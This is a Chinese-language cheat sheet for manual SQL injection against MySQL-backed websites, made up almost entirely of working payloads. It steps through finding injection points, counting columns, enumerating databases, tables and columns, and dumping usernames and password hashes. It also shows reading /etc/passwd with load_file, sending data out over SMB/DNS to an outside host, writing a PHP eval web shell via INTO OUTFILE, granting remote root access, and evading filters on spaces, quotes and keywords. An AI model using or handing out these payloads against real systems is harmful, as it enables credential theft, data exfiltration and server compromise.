SQL注入
MySQL 手工注入:
一、判断注入点是否存在:
1.1 数字型:
http://www.xxx.cn/list.php?page=4&id=524' 返回错误
http://www.xxx.cn/list.php?page=4&id=524 and 1=1 返回正确
http://www.xxx.cn/list.php?page=4&id=524 and 1=2 返回错误
PS:
弱类型语言(ASP/PHP): 'id=8' => int、 'id=8 and 1=1' => String
强类型语言(java/C#): String转换int,则会抛出异常
1.2 字符型:
http://www.xxx.cn/list.php?page=4&cid=x' 返回错误
http://www.xxx.cn/list.php?page=4&cid=x' and '1'='1 返回正确
http://www.xxx.cn/list.php?page=4&cid=x' and '1'='1 返回错误
1.3 搜索型:
' 返回错误
x%' and 1=1 and '%'=' 返回正确
x%' and 1=2 and '%'=' 返回错误
PS:
LIKE查询:SELECT * from runoob_tbl WHERE runoob_author LIKE '%COM'
'%a%' //含有a的数据
二、判断字段数
2.1 数字型:
http://www.xxx.cn/list.php?page=4&id=524 order by 17 返回正确
http://www.xxx.cn/list.php?page=4&id=524 order by 18 返回错误
2.2 字符型:
http://www.xxx.cn/list.php?page=4&cid=x' order by 17 # 返回正确
http://www.xxx.cn/list.php?page=4&cid=x' order by 18 # 返回错误
2.3 搜索型:
x%' order by 17 # 返回正确
x%' order by 18 # 返回错误
PS:
order by:根据指定的列对结果集进行排序
SQL注入order by作用是判断表中有多少个字段
三、寻找可显示字段:
3.1 数字型:
http://www.xxx.cn/list.php?page=4&id=524 and 1=2 union select 1,2,3,4,5,6,7,8,9,....
3.2 字符型:
http://www.xxx.cn/list.php?page=4&cid=x' and 1=2 union select 1,2,3,4,5,6,7,8,9,.... #
3.3 搜索型:
x%' and 1=2 union select 1,2,3,4,5,6,7,8,9,.... #
四、查数据库名
4.1 数字型:
http://www.xxx.cn/list.php?page=4&id=524 and 1=2 union select 1,2,database(),4,5,6,7,8,9,....
4.2 字符型:
http://www.xxx.cn/list.php?page=4&cid=x' and 1=2 union select 1,2,database(),4,5,6,7,8,9,.... #
4.3 搜索型:
x%' and 1=2 union select 1,2,database(),4,5,6,7,8,9,.... #
PS:
select database()
五、查数据库中表名
5.1 数字型:
http://www.xxx.cn/list.php?page=4&id=524 and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='数据库名'
5.2 字符型:
http://www.xxx.cn/list.php?page=4&id=x' and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='数据库名' #
5.3 搜索型:
小智%' and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9,.... from information_schema.tables where table_schema='数据库名' #
select * from character_sets union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x776f72647072657373
PS:
1、数据库名可以使用十六进制:
2、information_schema库:
有tables表
table_schema(表属于那个数据库)
table_name(数据库里的表名)
3、group_concat:将group by产生的同一个分组中的值连接起来,返回一个字符串结果
六、查表中的列名
6.1 数字型:
http://www.xxx.cn/list.php?page=4&id=524 and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='表名'
6.2 字符型:
http://www.xxx.cn/list.php?page=4&id=x' and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='表名' #
6.3 搜索型:
小智%' and 1=2 union select 1,2,group_concat(column_name),4,5,6,7,8,9,.... from information_schema.columns where table_name='表名' #
PS:
1、表名也可以使用十六进制
2、select * from character_sets union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='wp_users'
七、查表中的数据
7.1 数字型:
http://www.xxx.cn/list.php?page=4&id=524 and 1=2 union select 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from 表名
7.2 字符型:
http://www.xxx.cn/list.php?page=4&id=x' and 1=2 union select 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from 表名 #
7.3 搜索型:
x%' and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9,.... from 表名 #
PS:
select * from character_sets union select 1,2,group_concat(user_login,user_pass),4 from wordpress.wp_users
MySQL 常用的函数:
显示数据库:show databases;
显示表名: show tables;
显示版本:select version();
显示字符集:select @@character_set_database;
显示计算机名:select @@hostname;
显示系统版本:select @@version_compile_os;
显示mysql路径:select @@basedir;
显示数据库路径:select @@datadir;
显示root密码:select User,Password from mysql.user;
开启外连:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
MySQL 函数的利用:
1、load_file()函数
查看权限:show variables like '%secure_file_priv%';
路径必须为绝对路径,而且需要root权限
union select 1,load_file('/etc/passwd'),3,4,5 #
用十六进行绕过单引号过滤
union select 1,load_file(0x272F6574632F70617373776427),3,4,5 #
PS:
select load_file('C:\Windows\win.ini')
select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb协议
select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道
2、out_file()函数
select 1,'<?php eval($_POST[cmd])?>',3 into outfile 'D:/test.php'--
SQL注入QA~
Q:id-1 判断有注入 id+1 可以吗?
A:不行,URL+代表空格
Q:mysql有几种注释方式?
A:三种:
1、# 注释该行
2、/注释多行/
3、--+(--为注释,空格会被浏览器过滤所以有+)
Q:/*! ... */啥意思?
A:注释后+!+数据库编号,注释可以被执行
select 1 /*!40119 + 1*/
返回2(MySQL版本为4.01.19或者更高)
返回1(其他情况)
select 1 /*!40119 + 1,version()*/
Q:"select select * from admin" 可以执行吗?
A:不可以,select双层需要加() eg: select (select @@datadir);
Q:windows下的Oracle数据库是什么权限?
A:必须是以system权限运行
过滤:
Q:空格过滤了,可以使用那些绕过,eg:un%0aion当union?
A://来替换eg: select/**/(select/**/@@datadir);
%09
%0A
%0D
+
/|–|/
/@–|/
/?–|/
/|%20–%20|/
Q:'='被过滤?
A:考虑like替换
eg:union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name like 'wp_users'
Q:空格被过滤?
A:考虑/**/'替换
eg:union/**/select/**/password/**/from/**/users/**/where/**/username/**/like/**/admin;
Q:关键字被过滤?
A:考虑内链注释来绕过:
uni/**/on/**/sel/**/ect/**/password/**/fr/**/om/**/users/**/wh/**/ere/**/username/**/like/**/admin;
比较MSSQL、MYSQL、Oracle:
Q:SQL注入中'+'?
A:
MSSQL: "+"运算符被用于字符串和加法运算 '1'+'1'='11',1+1=2;
MySQL:"+"运算符只被用于加法运算,'1'+'1'='2',1+1=2;
Oracle:"+"运算符只被用于加法运算,'1'+'1'='2',1+1=2;
Q:字符串的连接符?
A:
MSSQL:'a' + 'b' = 'ab'
MYSQL:'a' 'b' = 'ab'
Oracle:'a'|| 'b' = 'ab'
Q:注释符:
MSSQL:'-- '(注意后面的空格),'/*...*/'
MySQL:'-- ','# ','/*...*/',注意,--后面必须要有一个或者多个空格。
Oracle:'-- ','/*...*/'
三种数据库中,通用的注释符是'-- '